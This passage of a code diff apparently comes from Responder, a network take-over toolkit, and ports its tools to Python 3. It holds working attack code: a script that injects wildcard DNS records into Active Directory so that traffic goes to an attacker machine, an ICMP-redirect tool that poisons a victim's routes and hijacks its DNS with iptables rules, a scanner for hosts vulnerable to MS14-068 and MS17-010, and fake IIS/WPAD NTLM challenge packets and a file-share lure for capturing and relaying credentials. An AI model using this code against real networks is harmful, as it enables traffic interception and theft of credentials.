+        pass
+    res = dnsresolver.query(zone, 'SOA')
+    for answer in res:
+        return answer.serial + 1
+
+def new_A_record(type, serial):
+    nr = DNS_RECORD()
+    nr['Type'] = type
+    nr['Serial'] = serial
+    nr['TtlSeconds'] = 180
+    nr['Rank'] = 240
+    return nr
+
+ddict1 = defaultdict(list)
+
+parser = argparse.ArgumentParser(description='Add/ Remove DNS records for an effective pawning with responder')
+    
+parser.add_argument("-DNS", type=str,help="IP address of the DNS server/ Domain Controller to connect to")
+parser.add_argument("-u","--user",type=str,help="Domain\\Username for authentication.")
+parser.add_argument("-p","--password",type=str,help="Password or LM:NTLM hash, will prompt if not specified")
+parser.add_argument("-a", "--action", type=str, help="ad, rm, or an: add, remove, analyze")
+parser.add_argument("-r", "--record", type=str, help="DNS record name")
+parser.add_argument("-d", "--data", help="The IP address of attacker machine")
+parser.add_argument("-l", "--logfile", type=str, help="The log file of Responder in analyze mode")
+
+
+
+args = parser.parse_args()
+#Checking Username and Password
+if args.user is not None:
+    if not '\\' in args.user:
+        print('Username must include a domain, use: Domain\\username')
+        sys.exit(1)
+    if args.password is None:
+        args.password = getpass.getpass()
+
+#Check the required arguments
+if args.action in ['ad', 'rm']:
+    if args.action == 'ad' and not args.record:
+        flag = input("No record provided, Enter 'Y' to add a Wildcard record: ")
+        if flag.lower() == 'y' or flag.lower() == 'yes':
+            recordname = "*"
+        else:
+            sys.exit(1)     
+    else:
+        recordname = args.record
+    if args.action == 'ad' and not args.data:
+        print("Provide an IP address with argument -d")
+        sys.exit(1)
+    if args.action == "rm" and not args.record:
+        print("No record provided to be deleted")
+elif args.action == "an":
+    if args.logfile:
+        with open(args.logfile) as infile:
+            for lline in infile:
+                templist = lline.split(":")
+                tempIP = templist[2].split( )[0]
+                tempRecord = templist[3].split( )[0]
+                ddict1[tempRecord].append(tempIP)
+        infile.close()
+        for k,v in ddict1.items():
+            print("The request %s was made by %s hosts" % (k, len(set(v))))
+        sys.exit(0)
+    else:
+        print("Provide a log file from responder session in analyze mode")
+        sys.exit(1)
+else:
+    print("Choose one of the three actions")
+    sys.exit(1)
+
+#inital connection
+dnserver = ldap3.Server(args.DNS, get_info=ldap3.ALL)
+print('Connecting to host...')
+con = ldap3.Connection(dnserver, user=args.user, password=args.password, authentication=ldap3.NTLM)
+print('Binding to host')
+# Binding with the user context 
+if not con.bind():
+    print('Bind failed, Check the Username and Password')
+    print(con.result)
+    sys.exit(1)
+print('Bind OK')
+
+#Configure DN for the record, gather domainroot, dnsroot, zone
+domainroot = dnserver.info.other['defaultNamingContext'][0]
+dnsroot = 'CN=MicrosoftDNS,DC=DomainDnsZones,%s' % domainroot
+zone = re.sub(',DC=', '.', domainroot[domainroot.find('DC='):], flags=re.I)[3:]
+if recordname.lower().endswith(zone.lower()):
+    recordname = recordname[:-(len(zone)+1)]
+record_dn = 'DC=%s,DC=%s,%s' % (recordname, zone, dnsroot)
+
+if args.action == 'ad':
+    record = new_A_record(1, getserial(args.DNS, zone))
+    record['Data'] = DNS_RPC_RECORD_A()
+    record['Data'] = socket.inet_aton(args.data)
+
+    #Adding the data to record object
+    recorddata = {
+        #'objectClass': ['top', 'dnsNode'],
+        'dNSTombstoned': False,
+        'name': recordname,
+        'dnsRecord': [record.getData()]
+        }
+    objectClass = ['top', 'dnsNode']
+
+    print('Adding the record')
+
+    con.add(record_dn, objectClass, recorddata)
+    #con.add(record_dn, ['top', 'dnsNode'], recorddata)
+    print(con.result)
+
+elif args.action == 'rm':
+    #searching for the record
+    searchbase = 'DC=%s,%s' % (zone, dnsroot)
+    con.search(searchbase, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(recordname), attributes=['dnsRecord','dNSTombstoned','name'])
+    if len(con.response) != 0:
+        for entry in con.response:
+            if entry['type'] != 'searchResEntry':
+                print("Provided record does not exists")
+                sys.exit(1)
+            else:
+                record_dn = entry['dn']
+                print(entry['raw_attributes']['dnsRecord'])
+    else:
+        print("Provided record does not exists")
+
+    con.delete(record_dn)
+    if con.result['description'] == "success":
+        print("Record deleted successfully")
+        

tools/FindSMB2UPTime.py

@@ -1,72 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys
-import os
-import datetime
-import struct
-import socket
-
-sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
-from packets import SMBHeaderReq, SMB2NegoReq, SMB2NegoDataReq
-
-def GetBootTime(data):
-    Filetime = int(struct.unpack('<q',data)[0])
-    t = divmod(Filetime - 116444736000000000, 10000000)
-    time = datetime.datetime.fromtimestamp(t[0])
-    return time, time.strftime('%Y-%m-%d %H:%M:%S')
-
-
-def IsDCVuln(t):
-    Date = datetime.datetime(2014, 11, 17, 0, 30)
-    if t[0] < Date:
-       print "System is up since:", t[1]
-       print "This system may be vulnerable to MS14-068"
-    Date = datetime.datetime(2017, 03, 14, 0, 30)
-    if t[0] < Date:
-       print "System is up since:", t[1]
-       print "This system may be vulnerable to MS17-010"
-    print "DC is up since:", t[1]
-
-
-def run(host):
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(host)  
-    s.settimeout(5) 
-
-    Header = SMBHeaderReq(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
-    Nego = SMB2NegoReq(Data = SMB2NegoDataReq())
-    Nego.calculate()
-
-    Packet = str(Header)+str(Nego)
-    Buffer = struct.pack(">i", len(Packet)) + Packet
-    s.send(Buffer)
-
-    try:
-        data = s.recv(1024)
-        if data[4:5] == "\xff":
-           print "This host doesn't support SMBv2" 
-        if data[4:5] == "\xfe":
-           IsDCVuln(GetBootTime(data[116:124]))
-    except Exception:
-        s.close()
-        raise
-
-if __name__ == "__main__":
-    if len(sys.argv)<=1:
-        sys.exit('Usage: python '+sys.argv[0]+' System-IP-address')
-    host = sys.argv[1],445
-    run(host)

tools/FindSQLSrv.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,25 +16,23 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from socket import *
 
-print 'MSSQL Server Finder 0.1'
+print('MSSQL Server Finder 0.3')
 
 s = socket(AF_INET,SOCK_DGRAM)
 s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
-s.settimeout(2)
-s.sendto('\x02',('255.255.255.255',1434))
+s.settimeout(5)
+s.sendto(b'\x02',('255.255.255.255',1434))
 
 try:
-   while 1:
-      data, address = s.recvfrom(8092)
-      if not data:
-         break
-      else:
-         print "==============================================================="
-         print "Host details:",address[0]
-         print data[2:]
-         print "==============================================================="
-         print ""
+    while 1:
+        data, address = s.recvfrom(8092)
+        if not data:
+            break
+        else:
+            print("===============================================================")
+            print(("Host details: %s"%(address[0])))
+            print((data[2:]).decode('latin-1'))
+            print("===============================================================")
+            print("")
 except:
-   pass
-
-
+    pass

tools/Icmp-Redirect.py

@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -19,14 +19,16 @@ import struct
 import optparse
 import pipes
 import sys
+import codecs
 from socket import *
 sys.path.append('../')
 from odict import OrderedDict
 from random import randrange
 from time import sleep
 from subprocess import call
-from packets import Packet
 
+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
 parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
                                prog=sys.argv[0],
                                )
@@ -40,23 +42,23 @@ parser.add_option('-a', '--alternate',action="store", help="The alternate gatewa
 options, args = parser.parse_args()
 
 if options.OURIP is None:
-    print "-i mandatory option is missing.\n"
+    print("-i mandatory option is missing.\n")
     parser.print_help()
     exit(-1)
 elif options.OriginalGwAddr is None:
-    print "-g mandatory option is missing, please provide the original gateway address.\n"
+    print("-g mandatory option is missing, please provide the original gateway address.\n")
     parser.print_help()
     exit(-1)
 elif options.VictimIP is None:
-    print "-t mandatory option is missing, please provide a target.\n"
+    print("-t mandatory option is missing, please provide a target.\n")
     parser.print_help()
     exit(-1)
 elif options.Interface is None:
-    print "-I mandatory option is missing, please provide your network interface.\n"
+    print("-I mandatory option is missing, please provide your network interface.\n")
     parser.print_help()
     exit(-1)
 elif options.ToThisHost is None:
-    print "-r mandatory option is missing, please provide a destination target.\n"
+    print("-r mandatory option is missing, please provide a destination target.\n")
     parser.print_help()
     exit(-1)
 
@@ -78,13 +80,53 @@ def Show_Help(ExtraHelpData):
 
 MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)
 
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
 def GenCheckSum(data):
     s = 0
     for i in range(0, len(data), 2):
         q = ord(data[i]) + (ord(data[i+1]) << 8)
         f = s + q
         s = (f & 0xffff) + (f >> 16)
-    return struct.pack("<H",~s & 0xffff)
+    return StructWithLenPython2or3("<H",~s & 0xffff)
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
 
 #####################################################################
 #ARP Packets
@@ -110,8 +152,8 @@ class ARPWhoHas(Packet):
     ])
 
     def calculate(self):
-        self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
-        self.fields["SenderIP"] = inet_aton(OURIP)
+        self.fields["DstIP"] = inet_aton(self.fields["DstIP"]).decode('latin-1')
+        self.fields["SenderIP"] = inet_aton(OURIP).decode('latin-1')
 
 #####################################################################
 #ICMP Redirect Packets
@@ -141,11 +183,11 @@ class IPPacket(Packet):
 
     def calculate(self):
         self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
-        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"]))
-        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"]))
+        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"])).decode('latin-1')
+        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"])).decode('latin-1')
         # Calc Len First
         CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
-        self.fields["Len"] = struct.pack(">H", len(CalculateLen))
+        self.fields["Len"] = StructWithLenPython2or3(">H", len(CalculateLen))
         # Then CheckSum this packet
         CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
         self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
@@ -160,7 +202,7 @@ class ICMPRedir(Packet):
     ])
 
     def calculate(self):
-        self.fields["GwAddr"] = inet_aton(OURIP)
+        self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1')
         CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
         self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
 
@@ -177,27 +219,27 @@ def ReceiveArpFrame(DstAddr):
     s.settimeout(5)
     Protocol = 0x0806
     s.bind((Interface, Protocol))
-    OurMac = s.getsockname()[4]
+    OurMac = s.getsockname()[4].decode('latin-1')
     Eth = EthARP(SrcMac=OurMac)
     Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
     Arp.calculate()
     final = str(Eth)+str(Arp)
     try:
-        s.send(final)
+        s.send(NetworkSendBufferPython2or3(final))
         data = s.recv(1024)
         DstMac = data[22:28]
-        DestMac = DstMac.encode('hex')
-        PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
-        return PrintMac,DstMac
+        DestMac = codecs.encode(DstMac, 'hex')
+        PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)])
+        return PrintMac,DstMac.decode('latin-1')
     except:
-        print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
+        print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr))
         exit(1)
 
 def IcmpRedirectSock(DestinationIP):
     PrintMac,DestMac = ReceiveArpFrame(VictimIP)
-    print '[ARP]Target Mac address is :',PrintMac
+    print('[ARP]Target Mac address is :',PrintMac)
     PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
-    print '[ARP]Router Mac address is :',PrintMac
+    print('[ARP]Router Mac address is :',PrintMac)
     s = socket(AF_PACKET, SOCK_RAW)
     Protocol = 0x0800
     s.bind((Interface, Protocol))
@@ -209,12 +251,12 @@ def IcmpRedirectSock(DestinationIP):
     IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
     IPPack.calculate()
     final = str(Eth)+str(IPPack)
-    s.send(final)
-    print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
+    s.send(NetworkSendBufferPython2or3(final))
+    print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP))
 
 def FindWhatToDo(ToThisHost2):
     if ToThisHost2 != None:
-        Show_Help('Hit CRTL-C to kill this script')
+        Show_Help('Hit CTRL-C to kill this script')
         RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
     if ToThisHost2 == None:
         Show_Help(MoreHelp)
@@ -227,11 +269,11 @@ def RunThisInLoop(host, host2, ip):
     ouripadd = pipes.quote(ip)
     call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
     call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
-    print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
+    print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.")
     while True:
         IcmpRedirectSock(DestinationIP=dns1)
         IcmpRedirectSock(DestinationIP=dns2)
-        print "[+]Repoisoning the target in 8 minutes..."
+        print("[+]Repoisoning the target in 8 minutes...")
         sleep(480)
 
 FindWhatToDo(ToThisHost2)

tools/MultiRelay/RelayMultiPackets.py

@@ -1,5 +1,6 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# -*- coding: latin-1 -*-
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,24 +17,39 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
 import os
+import sys
 from odict import OrderedDict
 import datetime
 from base64 import b64decode, b64encode
 
+# Packet class handling all packet generation (see odict.py).
 class Packet():
-    fields = OrderedDict([
-        ("data", ""),
-    ])
-    def __init__(self, **kw):
-        self.fields = OrderedDict(self.__class__.fields)
-        for k,v in kw.items():
-            if callable(v):
-                self.fields[k] = v(self.fields[k])
-            else:
-                self.fields[k] = v
-    def __str__(self):
-        return "".join(map(str, self.fields.values()))
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))
 
+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+	#Python2...
+	if PY2OR3 == "PY2":
+		return struct.pack(endian, data)
+	#Python3...
+	else:
+		return struct.pack(endian, data).decode('latin-1')
 
 ##################HTTP Proxy Relay##########################
 def HTTPCurrentDate():
@@ -42,178 +58,176 @@ def HTTPCurrentDate():
 
 #407 section.
 class WPAD_Auth_407_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
-		("Connection",    "Proxy-Connection: close\r\n"),
-		("Cache-Control",    "Cache-Control: no-cache\r\n"),
-		("Pragma",        "Pragma: no-cache\r\n"),
-		("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("Type",          "Content-Type: text/html\r\n"),
+            ("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
+            ("Connection",    "Proxy-Connection: close\r\n"),
+            ("Cache-Control",    "Cache-Control: no-cache\r\n"),
+            ("Pragma",        "Pragma: no-cache\r\n"),
+            ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
+            ("Len",           "Content-Length: 0\r\n"),
+            ("CRLF",          "\r\n"),
+    ])
 
 
 class WPAD_NTLM_Challenge_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWWAuth",       "Proxy-Authenticate: NTLM "),
-		("Payload",       ""),
-		("Payload-CRLF",  "\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("Type",          "Content-Type: text/html\r\n"),
+            ("WWWAuth",       "Proxy-Authenticate: NTLM "),
+            ("Payload",       ""),
+            ("Payload-CRLF",  "\r\n"),
+            ("Len",           "Content-Length: 0\r\n"),
+            ("CRLF",          "\r\n"),
+    ])
 
-	def calculate(self,payload):
-		self.fields["Payload"] = b64encode(payload)
+    def calculate(self,payload):
+        self.fields["Payload"] = b64encode(payload)
 
 #401 section:
 class IIS_Auth_401_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("Type",          "Content-Type: text/html\r\n"),
+            ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
+            ("Len",           "Content-Length: 0\r\n"),
+            ("CRLF",          "\r\n"),
+    ])
 
 class IIS_Auth_Granted(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
-		("ContentLen",    "Content-Length: "),
-		("ActualLen",     "76"),
-		("CRLF",          "\r\n\r\n"),
-		("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
-	])
-	def calculate(self):
-		self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 200 OK\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("Type",          "Content-Type: text/html\r\n"),
+            ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
+            ("ContentLen",    "Content-Length: "),
+            ("ActualLen",     "76"),
+            ("CRLF",          "\r\n\r\n"),
+            ("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 
 class IIS_NTLM_Challenge_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWWAuth",       "WWW-Authenticate: NTLM "),
-		("Payload",       ""),
-		("Payload-CRLF",  "\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("Type",          "Content-Type: text/html\r\n"),
+            ("WWWAuth",       "WWW-Authenticate: NTLM "),
+            ("Payload",       ""),
+            ("Payload-CRLF",  "\r\n"),
+            ("Len",           "Content-Length: 0\r\n"),
+            ("CRLF",          "\r\n"),
+    ])
 
-	def calculate(self,payload):
-		self.fields["Payload"] = b64encode(payload)
+    def calculate(self,payload):
+        self.fields["Payload"] = b64encode(payload)
 
 class IIS_Basic_401_Ans(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("Type",          "Content-Type: text/html\r\n"),
-		("WWW-Auth",      "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
-		("AllowOrigin",   "Access-Control-Allow-Origin: *\r\n"),
-		("AllowCreds",    "Access-Control-Allow-Credentials: true\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("CRLF",          "\r\n"),
-	])
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("Type",          "Content-Type: text/html\r\n"),
+            ("WWW-Auth",      "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
+            ("AllowOrigin",   "Access-Control-Allow-Origin: *\r\n"),
+            ("AllowCreds",    "Access-Control-Allow-Credentials: true\r\n"),
+            ("Len",           "Content-Length: 0\r\n"),
+            ("CRLF",          "\r\n"),
+    ])
 
 ##################WEBDAV Relay Packet#########################
 class WEBDAV_Options_Answer(Packet):
-	fields = OrderedDict([
-		("Code",          "HTTP/1.1 200 OK\r\n"),
-		("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
-		("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
-		("Allow",         "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
-		("Len",           "Content-Length: 0\r\n"),
-		("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
-		("Connection",    "Connection: Keep-Alive\r\n"),
-		("Content-Type",  "Content-Type: text/html\r\n"),
-		("CRLF",          "\r\n"),
-	])
+    fields = OrderedDict([
+            ("Code",          "HTTP/1.1 200 OK\r\n"),
+            ("Date",          "Date: "+HTTPCurrentDate()+"\r\n"),
+            ("ServerType",    "Server: Microsoft-IIS/7.5\r\n"),
+            ("Allow",         "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
+            ("Len",           "Content-Length: 0\r\n"),
+            ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
+            ("Connection",    "Connection: Keep-Alive\r\n"),
+            ("Content-Type",  "Content-Type: text/html\r\n"),
+            ("CRLF",          "\r\n"),
+    ])
 
 ##################SMB Relay Packet############################
 def midcalc(data):  #Set MID SMB Header field.
-    return data[34:36]
+    return data[34:36].decode('latin-1')
 
 def uidcalc(data):  #Set UID SMB Header field.
-    return data[32:34]
+    return data[32:34].decode('latin-1')
 
 def pidcalc(data):  #Set PID SMB Header field.
-    pack=data[30:32]
-    return pack
+    return data[30:32].decode('latin-1')
 
 def tidcalc(data):  #Set TID SMB Header field.
-    pack=data[28:30]
-    return pack
+    return data[28:30].decode('latin-1')
 
 #Response packet.
 class SMBRelayNegoAns(Packet):
-	fields = OrderedDict([
-		("Wordcount",                 "\x11"),
-		("Dialect",                   ""),
-		("Securitymode",              "\x03"),
-		("MaxMpx",                    "\x32\x00"),
-		("MaxVc",                     "\x01\x00"),
-		("MaxBuffSize",               "\x04\x41\x00\x00"),
-		("MaxRawBuff",                "\x00\x00\x01\x00"),
-		("SessionKey",                "\x00\x00\x00\x00"),
-		("Capabilities",              "\xfd\xf3\x01\x80"),
-		("SystemTime",                "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
-		("SrvTimeZone",               "\xf0\x00"),
-		("KeyLen",                    "\x00"),
-		("Bcc",                       "\x10\x00"),
-		("Guid",                      os.urandom(16)),
-	])
+    fields = OrderedDict([
+            ("Wordcount",                 "\x11"),
+            ("Dialect",                   ""),
+            ("Securitymode",              "\x03"),
+            ("MaxMpx",                    "\x32\x00"),
+            ("MaxVc",                     "\x01\x00"),
+            ("MaxBuffSize",               "\x04\x41\x00\x00"),
+            ("MaxRawBuff",                "\x00\x00\x01\x00"),
+            ("SessionKey",                "\x00\x00\x00\x00"),
+            ("Capabilities",              "\xfd\xf3\x01\x80"),
+            ("SystemTime",                "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
+            ("SrvTimeZone",               "\xf0\x00"),
+            ("KeyLen",                    "\x00"),
+            ("Bcc",                       "\x10\x00"),
+            ("Guid",                      os.urandom(16).decode('latin-1')),
+    ])
 
 ##Response packet.
 class SMBRelayNTLMAnswer(Packet):
-	fields = OrderedDict([
-		("Wordcount",             "\x04"),
-		("AndXCommand",           "\xff"),
-		("Reserved",              "\x00"),
-		("Andxoffset",            "\x5f\x01"),
-		("Action",                "\x00\x00"),
-		("SecBlobLen",            "\xea\x00"),
-		("Bcc",                   "\x34\x01"),
-                ###NTLMPACKET
-		("Data",                  ""),
-                ###NTLMPACKET
+    fields = OrderedDict([
+            ("Wordcount",             "\x04"),
+            ("AndXCommand",           "\xff"),
+            ("Reserved",              "\x00"),
+            ("Andxoffset",            "\x5f\x01"),
+            ("Action",                "\x00\x00"),
+            ("SecBlobLen",            "\xea\x00"),
+            ("Bcc",                   "\x34\x01"),
+            ###NTLMPACKET
+            ("Data",                  ""),
+            ###NTLMPACKET
 
-	])
+    ])
 
 
 #Request packet (no calc):
 class SMBSessionSetupAndxRequest(Packet):
-	fields = OrderedDict([
-		("Wordcount", "\x0c"),
-        	("AndXCommand", "\xff"),
-        	("Reserved","\x00" ),
-       	        ("AndXOffset", "\xec\x00"),              
-        	("MaxBuff","\xff\xff"),
-        	("MaxMPX", "\x32\x00"),
